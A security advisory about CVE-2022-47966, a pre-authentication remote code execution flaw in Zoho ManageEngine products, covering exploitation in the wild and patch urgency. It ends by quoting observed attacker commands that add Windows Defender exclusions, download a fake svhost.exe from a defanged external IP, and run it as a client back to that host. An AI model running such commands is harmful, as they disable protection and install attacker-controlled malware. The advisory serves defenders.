UPDATE: 2/27/2023 - Last month, Avertium published the below Flash Notice regarding a Zoho ManageEngine (CVE-2022-47966) vulnerability being exploited in the wild. The vulnerability is a pre-authentication remote code execution vulnerability stemming from an outdated version of the Apache Santuario library and was found in two dozen ManageEngine products.
While the vulnerability has been patched, there is a growing number of threat actors exploiting the flaw. CVE-2022-47966 allows for full takeover of the compromised system by unauthenticated attackers and victims are located across the globe within various industries. Based on the analysis of Bitdefender’s researchers, 2,000 to 4,000 servers accessible from the internet are still running at least one of the vulnerable versions of Apache Santuario.
Bitdefender stated that the existing PoC is not capable of exploiting all servers, as SAML configuration is required. However, it is highly recommended that all businesses running vulnerable versions patch immediately. Please see the link to ManageEngine’s patch guidance mentioned in our original Flash Notice below.
A vulnerability was found in two dozen ManageEngine products which is currently being exploited in the wild. CVE-2022-47966 is a pre-authentication remote code execution (RCE) vulnerability stemming from an outdated version of the Apache Santuario library.
CVE-2022-47966 impacts several popular products used by large organizations, including ServiceDesk Plus, ADSelfService Plus, Active Directory 360, Access Manager Plus, and others. Between October and November 2022, patches were released but the timing of the fixed version releases varies by product.
During testing, researchers from Rapid7 found that some products may be more exploitable than others. For example, the researchers stated that ServiceDesk Plus is easy to exploit with the proof-of-concept code (PoC), but successful attackers would need to obtain two additional pieces of information to modify the PoC.
As previously stated, an obsolete version of the Apache Santuario library, which implements security requirements for XML, was the cause of the vulnerability. A SAML request with an incorrect signature can be used to exploit the issue if SAML single sign-on is currently or has previously been enabled on those products.
Due to the popularity of ManageEngine solutions, a vulnerability such as CVE-2022-47966 puts organizations at serious risk by giving attackers initial access and the potential to move laterally using privileged credentials. Avertium recommends that all organizations using the affected products listed in ManageEngine’s advisory, patch immediately.
Please read ManageEngine’s advisory for updated product and version information, as well as patch guidance.
Post Exploitation MITRE ATT&CK Techniques (observed by Rapid7)
powershell -windowstyle hidden set-mppreference –
set-mppreference -exclusionpath c:\users\public
invoke-webrequest -uri http://111.68.7[.]122:8081/svhost.exe
c:\users\public\svhost.exe client 111.68.7[.]122:8080